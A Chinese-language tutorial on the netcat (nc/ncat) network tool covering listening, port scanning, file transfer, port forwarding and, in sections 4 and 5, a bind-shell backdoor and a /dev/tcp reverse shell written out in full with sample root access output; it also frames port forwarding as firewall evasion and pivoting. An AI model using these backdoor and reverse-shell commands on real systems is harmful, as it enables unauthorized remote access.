网络中的瑞士军刀ncnetcat命令，你用过吗？

ncat/nc既是一个端口扫描工具，也是一款安全工具，还能是一款监测工具， 它可以用来在网络上读、写以及重定向数据。 同时它还能创建任意所需的连接，由于有这么多的功能，它被誉为是网络界的瑞士军刀。 每个运维人员都应该知道并且掌握它。

在CentOS 7/RHEL 7的最小化安装中，nc并不会默认被安装。 所以需要用下列命令手工安装。

[root@linuxtechi ~]# yum -y install nmap-ncat

运维人员使用nc可以用来审计系统安全，用它来找出开放的端口然后保护这些端口。 还能用它作为客户端来审计Web服务器、telnet服务器、邮件服务器等， 通过nc我们可以控制发送的每个字符，也可以查看对方的回应。

下面看几个nc常用例子。

1、监听入站连接

完整的命令是这样的：

[root@localhost ~]# ncat -l port_number

通过“-l”选项，ncat可以进入监听模式。指定该参数，则意味着nc被当作server，侦听并接受连接，而非向其它地址发起连接。

例如：

[root@localhost ~]# ncat -l 8080

服务器就会开始在8080端口监听入站连接。

2、使用nc探测端口状态

不同版本，nc的用法稍有不同，在CentOS6.x版本下，可以通过nc扫描系统中开放了哪些端口，例如：

[root@nnmaster ~]#   nc -nvz 172.16.213.155 80
Connection to 172.16.213.155 80 port [tcp/*] succeeded!

[root@nnmaster ~]#   nc -nvz 172.16.213.37 20-23
nc: connect to 172.16.213.37 port 20 (tcp) failed: Connection refused
nc: connect to 172.16.213.37 port 21 (tcp) failed: Connection refused
Connection to 172.16.213.37 22 port [tcp/*] succeeded!
nc: connect to 172.16.213.37 port 23 (tcp) failed: Connection refused

其中：

? ”-n“表示直接使用ip地址，而不通过域名服务器
? ”-v“输出更详细的指令执行结果。
? ”-z“使用0输入/输出模式，只在扫描通信端口时使用

而在CentOS7.x版本下，nc要探测端口的话，使用方法如下：

nc -w 3   IP地址    端口 < /dev/null && echo "tcp port ok"

其中，”-w“参数是表示超时秒数，后面跟数字。

例如：

[root@SparkMaster ~]# nc -w 3 172.16.213.170 8080 < /dev/null && echo "tcp port ok" 
tcp port ok

如果端口是通的，那么将返回“tcp port ok”，反之返回“Ncat: Connection refused“提示。同理，要探测udp端口状态，需要使用”-u“参数，例如：

nc -u -w 3 IP地址 端口 < /dev/null && echo "udp port ok"

3、通过nc进行文件、目录传输

nc还能用来在系统间拷贝文件，虽然这么做并不推荐，因为绝大多数系统默认都安装了ssh/scp。 不过如果恰好你遇见个没有ssh/scp的系统的话， 你可以用nc来作为后备。

首先，在A机器（从这个机器拷贝数据文件，ip为172.16.213.230）启动10000端口，进入监听模式，执行如下命令：

[root@localhost ~]# nc -l 10000 --send-only  < jdk1.8.0_171.tar.gz

接着，在B机器（拷贝文件到这台机器）执行如下命令：

[root@localhost ~]# nc -n 172.16.213.230 10000 --recv-only > jdk.tar.gz

jdk1.8.0_171.tar.gz是要发送的文件，jdk.tar.gz是传输到B机器上后的文件名。”-–send-only“选项会在文件拷贝完后立即关闭连接。 如果不加该选项，需要手工按下ctrl+c来关闭连接。同理，”--recv-only“是接收完毕后自动关闭连接。

发送一个文件很简单，但是如果我们想要发送多个文件，或者整个目录呢，是的，一样很简单，只需要使用压缩工具tar，压缩后发送压缩包即可，然后在接收端自动解压。

首先，在A机器（发送端，ip为172.16.213.230），要将prometheus目录发送到远程B主机，执行如下命令：

[root@localhost ~]# tar -cvf - prometheus | nc -l 10000 --send-only

接着，在B机器执行如下命令，将接收A机器传输过来的prometheus目录，并保存到B主机的当前目录下：

[root@localhost ~]# nc -n 172.16.213.230 10000 --recv-only | tar -xvf -

当然，也可以选择性的指定要发送的目录，例如要发送A机器上的/usr/local/nginx目录到B机器的/app目录下，可以执行如下命令：

在A机器执行：

[root@localhost ~]# tar -cvf - /usr/local/nginx | nc -l 10000 --send-only

在B机器执行：

[root@localhost ~]# nc -n 172.16.213.230 10000 --recv-only | tar -xvf - -C /app

这样执行后，A机器上的/usr/local/nginx目录就发送到了B机器的/app目录下了。

4、通过nc创建一个shell后 门

nc命令还可以用来在系统中创建后 门，并且这种技术已经被黑 客大量使用，为了保护我们的系统安全，我们需要知道它是怎么做的。

首先，在A服务器（172.16.213.230）上执行如下命令，创建后门：

[root@localhost local]# ncat -l -k 10000 -e /bin/bash

”-e“标志将一个bash与端口10000相连。也就是说，现在客户端只要连接到服务器上的10000端口就能通过bash获取我们系统的完整访问权限。

”-k“选项表示强制nc待命，当客户端从服务端断开连接后，过一段时间服务端也会停止监听。 但通过选项”-k“我们可以强制服务器保持连接并继续监听端口。

接着，在任意能访问172.16.213.230的10000端口的客户端上执行如下命令，即可直接登录172.16.213.230的系统。如下图所示：

[root@SparkMaster nginx]# ncat 172.16.213.230 10000

5、nc反向shell的应用

反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置，这里服务器使用的是由客户提供的服务端口。

首先在远端任意一个客户端主机A（IP为172.16.213.231）监听一个端口，端口可以随意指定，这里指定一个20000端口：

[root@SparkMaster indices]# nc -l 20000

这样，20000在172.16.213.231主机上已经监听起来了。

接着，在另一个服务器B（ip地址为172.16.213.230）上执行如下命令：

[root@localhost local]# /bin/bash -i>& /dev/tcp/172.16.213.231/20000 0>&1 

现在回到A主机这个客户端上来，等待一分钟后，此终端会自动进入到shell命令行，注意看，这个进入的shell就是172.16.213.230主机了。

[root@SparkMaster indices]# nc -l 20000
[root@localhost ~]# ifconfig|grep eth0
eth0: flags=4163  mtu 1500
        inet 172.16.213.230  netmask 255.255.255.0  broadcast 172.16.213.255
        inet6 fe80::a00:27ff:feac:b073  prefixlen 64  scopeid 0x20
        ether 08:00:27:ac:b0:73  txqueuelen 1000  (Ethernet)
        RX packets 17415571  bytes 20456663691 (19.0 GiB)
        RX errors 0  dropped 156975  overruns 0  frame 0
        TX packets 2379917  bytes 2031493944 (1.8 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

看到了吧，顺利进入B服务器了，还是root用户，接下来你想干什么，都行。这个反弹shell就是先入 侵B服务器，然后在客户端就可以操作B了。

最后，解释下上面植入的那个反弹shell和redis命令。先看这个反弹shell的内容：

/bin/bash -i>& /dev/tcp/172.16.213.231/20000 0>&1

首先，“bash -i”是打开一个交互的bash，这个最简单。

其次，/dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用，建立一个socket连接，读写这个文件就相当于在这个socket连接中传输数据。同理，Linux中还存在/dev/udp/。

接着，“>&”其实和“&>”是一个意思，都是将标准错误输出重定向到标准输出。

最后，“0>&1”和“0<&1”也是一个意思，都是将标准输入重定向到标准输出中。

你要问这个0、1、2是什么意思吗，那我也解释下吧，在linux shell下，常用的文件描述符有如下三类：

（1）标准输入 (stdin) ：代码为0，使用 < 或 << ；
（2）标准输出 (stdout)：代码为1，使用 > 或 >> ；
（3）标准错误输出(stderr)：代码为2，使用 2> 或 2>>。

好了，基础普及完了，说下上面这个反弹shell的意思吧。综上所述，这句反弹shell的意思就是，创建一个可交互的bash和一个到172.16.213.231:20000的TCP链接，然后将bash的输入、输出错误都重定向到172.16.213.231的20000监听端口上。其中，172.16.213.231就是我的客户端主机地址。

6、通过nc进行端口转发

为什么要端口转发呢？因为防火墙，或者外网访问内网的原因。比如防火墙不允许访问本机的3389端口怎么办，或者外网要想访问一台内网机器怎么办。这时端口转发可以很好的解决这些问题。

常见的应用场景有：

（1）对于防火墙禁止访问某些端口的问题，比如3306端口，我们可以将利用机器的其它端口，比如5000端口做端口转发，从外界接受数据，转发给本机的3306端口，从而绕过防火墙。

（2）对于无法访问内网特定机器的问题，我们可以先抓取内网一台机器，然后利用这台主机进行端口转发，接受外网的数据，将数据转发到内网目标机器的特定端口。

nc实现端口转发很简单，看一个例子：

我们通过选项”-c“来用nc进行端口转发，实现端口转发的语法为：

[root@localhost ~]# ncat -l  80  -c  'ncat -l 8080'

这样，所有连接到80端口的连接都会转发到8080端口。

下面是个具体应用案例，如下图所示：

从上图可以看到，通过nc成功实现了端口转发请求，可见通过nc做端口转发非常简单。